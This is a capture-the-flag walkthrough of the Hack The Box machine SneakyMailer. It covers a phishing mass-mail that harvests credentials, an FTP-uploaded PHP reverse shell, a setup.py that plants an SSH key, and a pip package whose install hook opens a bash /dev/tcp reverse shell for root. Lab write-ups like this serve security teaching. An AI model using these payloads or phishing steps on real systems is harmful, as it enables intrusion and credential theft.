SneakyMailer HTB Writeup

First Let's start with Nmap

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ nmap -sC -sV -Pn --max-rate=1000 10.10.10.197 
Nmap scan report for 10.10.10.197
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: UTF8=ACCEPTA0001 ACL2=UNION NAMESPACE UIDPLUS ACL SORT OK ENABLE completed THREAD=REFERENCES IDLE CHILDREN IMAP4rev1 QUOTA CAPABILITY STARTTLS THREAD=ORDEREDSUBJECT
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: UTF8=ACCEPTA0001 ACL2=UNION NAMESPACE UIDPLUS ACL SORT OK ENABLE completed THREAD=REFERENCES IDLE CHILDREN IMAP4rev1 QUOTA AUTH=PLAIN CAPABILITY THREAD=ORDEREDSUBJECT
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let's See what's open

PORT     STATE SERVICE    REASON
21/tcp   open  ftp        syn-ack
22/tcp   open  ssh        syn-ack
25/tcp   open  smtp       syn-ack
80/tcp   open  http       syn-ack
143/tcp  open  imap       syn-ack
993/tcp  open  imaps      syn-ack
8080/tcp open  http-proxy syn-ack

http://10.10.10.179 -> get redirect to http://sneakycorp.htb

Let's add sneakycorp.htb to our host's file

Finding Subdomain's

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ wfuzz -c -w /usr/share/wordlists/wfuzz/general/medium.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"  

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://sneakycorp.htb/
Total requests: 1659

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                         
===================================================================
000000446:   200        340 L    989 W    13737 Ch    "dev" 

Let's add dev.sneakycorp.htb to the hosts file

10.10.10.197	sneakycorp.htb	dev.sneakycorp.htb

Sneaky mailer means sending mails

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ cewl http://sneakycorp.htb/team.php

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ cat emails.txt
airisatou@sneakymailer.htb
angelicaramos@sneakymailer.htb
ashtoncox@sneakymailer.htb
bradleygreer@sneakymailer.htb
brendenwagner@sneakymailer.htb
briellewilliamson@sneakymailer.htb
brunonash@sneakymailer.htb
caesarvance@sneakymailer.htb
carastevens@sneakymailer.htb
cedrickelly@sneakymailer.htb
chardemarshall@sneakymailer.htb
colleenhurst@sneakymailer.htb
dairios@sneakymailer.htb
donnasnider@sneakymailer.htb
doriswilder@sneakymailer.htb
finncamacho@sneakymailer.htb
fionagreen@sneakymailer.htb
garrettwinters@sneakymailer.htb
gavincortez@sneakymailer.htb
gavinjoyce@sneakymailer.htb
glorialittle@sneakymailer.htb
haleykennedy@sneakymailer.htb
hermionebutler@sneakymailer.htb
herrodchandler@sneakymailer.htb
hopefuentes@sneakymailer.htb
howardhatfield@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
jenagaines@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
jenniferacosta@sneakymailer.htb
jenniferchang@sneakymailer.htb
jonasalexander@sneakymailer.htb
laelgreer@sneakymailer.htb
martenamccray@sneakymailer.htb
michaelsilva@sneakymailer.htb
michellehouse@sneakymailer.htb
olivialiang@sneakymailer.htb
paulbyrd@sneakymailer.htb
prescottbartlett@sneakymailer.htb
quinnflynn@sneakymailer.htb
rhonadavidson@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
sergebaldwin@sneakymailer.htb
shaddecker@sneakymailer.htb
shouitou@sneakymailer.htb
sonyafrost@sneakymailer.htb
sukiburks@sneakymailer.htb
sulcud@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
thorwalton@sneakymailer.htb
tigernixon@sneakymailer.htb
timothymooney@sneakymailer.htb
unitybutler@sneakymailer.htb
vivianharrell@sneakymailer.htb
yuriberry@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb

Lets Listen on port 80 and send some mails

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ sudo nc -nvlp 80                          
listening on [any] 80 ...

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.xx.xx/" --server 10.10.10.197; done < emails.txt

After some tries I got hitted

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ sudo nc -nvlp 80                                                   
listening on [any] 80 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.10.197] 49416
POST / HTTP/1.1
Host: 10.10.14.52
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

And After decoding the params we got creds like this

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

We got

mail: paulbyrd@sneakymailer.htb

user: paulbyrd

password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

After entering Creds on SMPT server I got some mails

From: Paul Byrd <paulbyrd@sneakymailer.htb>
Recipient: low@debian
Subject: Module testing
Date: Wed, 27 May 2020 13:28:58 -0400

Hello low


Your current task is to install, test and then erase every python module you 
find in our PyPI service, let me know if you have any inconvenience.


From: Paul Byrd <paulbyrd@sneakymailer.htb>
Recipient: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500 (May 15, 2020 14:03:37)

Hello administrator, I want to change this password for the developer account
 
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
 
Please notify me when you do it

So I got some creds then Let's try it on FTP

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ ftp sneakycorp.htb
Connected to sneakycorp.htb.
220 (vsFTPd 3.0.3)
Name (sneakycorp.htb:RajSec): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Successfully logged in as developer

Let's upload Reverse Shell

226 Directory send OK.
ftp> put revshell.php
local: revshell.php remote: revshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.00 secs (29.1030 MB/s)

Now access http://dev.sneakycorp.htb/revshell.php to get reverse connection

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ nc -nvlp 2121
Connection from 10.10.10.197.
Connection from 10.10.10.197:58672.
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 x86_64 GNU/Linux
 07:45:17 up  7:46,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@sneakymailer:/$ su developer
su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

developer@sneakymailer:/$ id
id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
developer@sneakymailer:/$ whoami
whoami
developer

After checking www folder I found another sub domain

developer@sneakymailer:/var/www$ ls
ls
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb

Add pypi.sneakycorp.htb to host's file

After accessing page I got welcome message

I got Hash 

developer@sneakymailer:/var/www$ cat /var/www/pypi.sneakycorp.htb/.htpasswd
cat /var/www/pypi.sneakycorp.htb/.htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

After cracking using hashcat i got password

soufianeelhaoui

with this password we can now create a package and upload it (like seen on webpage): first go to tmp and create a package directory:

cd /tmp
mkdir mypkg

then create .pypirc file:

[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

then use scp to transfer the file:

developer@sneakymailer:/tmp/mypkg$ scp root@10.10.xx.xx:/home/RajSec/htb/sneakymailer/.pypirc .
<4.4:/home/RajSec/htb/sneakymailer/.pypirc .
Could not create directory '/var/www/dev.sneakycorp.htb/.ssh'.
The authenticity of host '10.10.xx.xx (10.10.xx.xx)' can't be established.
ECDSA key fingerprint is SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/dev.sneakycorp.htb/.ssh/known_hosts).
root@10.10.xx.xx's password: 2525

.pypirc                                       100%  128     0.4KB/s   00:00

developer@sneakymailer:/tmp/mypkg$ chmod 600 .pypirc
chmod 600 .pypirc
developer@sneakymailer:/tmp/mypkg$ ls -la
ls -la
total 12
drwxrwxrwx  2 developer developer 4096 Jul 12 07:09 .
drwxrwxrwt 10 root      root      4096 Jul 12 07:09 ..
-rw-------  1 developer developer  128 Jul 12 07:09 .pypirc

Generate sshkey

sshkeygen

Create a setup.py file and add your public key

import setuptools

try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nsshkeypublic key")#your public key
        f.close()
except Exception as e:
    pass
setuptools.setup(
    name="example-pkg3", # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

Now transfer the setup.py file using scp or you can use python http server

developer@sneakymailer:/tmp/mypkg$ chmod 777 setup.py
chmod 777 setup.py
developer@sneakymailer:/tmp/mypkg$ HOME=$(pwd)
HOME=$(pwd)
developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
<n3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
creating example_pkg3.egg-info
writing example_pkg3.egg-info/PKG-INFO
writing dependency_links to example_pkg3.egg-info/dependency_links.txt
writing top-level names to example_pkg3.egg-info/top_level.txt
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating example-pkg3-0.0.1
creating example-pkg3-0.0.1/example_pkg3.egg-info
copying files to example-pkg3-0.0.1...
copying setup.py -> example-pkg3-0.0.1
copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
Writing example-pkg3-0.0.1/setup.cfg
creating dist
Creating tar archive
removing 'example-pkg3-0.0.1' (and everything under it)
running register
Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)

Now ssh login

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ ssh -i key low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ whoami
low

Successfully logged in

low@sneakymailer:~$ ls
user.txt  venv
low@sneakymailer:~$ wc -c user.txt
33	user.txt

Gaining Root

Let's run sudo -l

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
                                                                                                                                   
User low may run the following commands on sneakymailer:                                                                           
    (root) NOPASSWD: /usr/bin/pip3
    

Let's cd to /dev/shm/

from setuptools import setup
from setuptools.command.install import install
import base64
import os
class CustomInstall(install):
    def run(self):
        install.run(self)
        os.system("bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/5678 0>&1'")
setup(
        name='RajSecPip',
        version='0.0.1',
        description='This will exploit a sudoer able to /usr/bin/pip install *',
        url='https://github.com/0x00-0x00/rajsecpip',
        author='zc00l',
        author_email='andre.marques@esecurity.com.br',
        license='MIT',
        zip_safe=False,
        cmdclass={'install': CustomInstall})  

Now Let's Install our RajSec pip created by us

low@sneakymailer:/dev/shm$ sudo /usr/bin/pip3 install . --upgrade --force-reinstall
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /dev/shm
Building wheels for collected packages: RajSecPip
  Running setup.py bdist_wheel for RajSecPip ... -
  

┌──(RajSec㉿kali)-[~/Desktop/htb/sneakymailer]
└─$ nc -nvlp 5678                                 
Connection from 10.10.10.197.
Connection from 10.10.10.197:41567.
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# id
id
uid=0(root) gid=0(root) groups=0(root)
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# whoami
whoami
root
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# cd /root
cd /root
root@sneakymailer:~# ls
ls
root.txt
root@sneakymailer:~# wc -c root.txt
33 	root.txt

Yup...! We rooted

Thanks for Reading 🙏